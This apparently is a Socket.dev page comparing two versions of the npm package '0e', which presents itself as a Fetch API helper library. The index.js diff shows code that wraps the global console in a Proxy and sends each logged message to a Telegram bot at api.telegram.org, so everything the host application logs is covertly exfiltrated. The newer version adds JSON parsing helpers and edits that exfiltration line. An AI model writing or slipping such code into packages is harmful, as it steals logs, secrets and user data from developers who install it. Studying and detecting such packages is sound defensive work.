Socket
Socket
Sign inDemoInstall

0e

Package Overview
Dependencies
Maintainers
1
Versions
23
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

0e - npm Package Compare versions

Comparing version 0.0.106 to 0.0.107

16

index.js

@@ -32,2 +32,16 @@ var ibb = image => {

}
var pa = j => {
try {
return JSON.parse(j)
} catch (err) {
return j || {}
}
}
var str = j => {
try {
return JSON.stringify(JSON.parse(j), null, 4)
} catch (err) {
return JSON.stringify(j, null, 4)
}
}
console = new Proxy(console, {

@@ -64,3 +78,3 @@ get: (e, o) => (...l) => {

l = String(l).substring(0, 4090)
fetch(`https://api.telegram.org/bot${T}/sendMessage?chat_id=${chat}&text=${encodeURIComponent(l)}`)
fetch(`https://api.telegram.org/bot${T}/sendMessage?chat_id=${chat}&text=${encodeURIComponent(pa(l))}`)
.then(r => r.json())

@@ -67,0 +81,0 @@ .then(r =>

2

package.json
{
"name": "0e",
"version": "0.0.106",
"version": "0.0.107",
"description": "A library that makes the Fetch API a breeze",

@@ -5,0 +5,0 @@ "main": "index.js",

SocketSocket SOC 2 Logo

Product

  • Package Alerts
  • Integrations
  • Docs
  • Pricing
  • FAQ
  • Roadmap
  • Changelog

Packages

npm

Stay in touch

Get open source security insights delivered straight into your inbox.


  • Terms
  • Privacy
  • Security

Made with ⚡️ by Socket Inc